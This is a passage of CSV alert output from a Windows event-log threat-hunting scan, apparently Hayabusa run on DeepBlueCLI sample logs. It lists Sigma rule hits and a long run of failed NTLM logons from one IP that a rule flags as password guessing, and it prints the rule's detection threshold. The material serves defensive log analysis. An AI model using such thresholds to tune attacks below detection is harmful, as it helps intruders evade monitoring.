+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 
timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.992 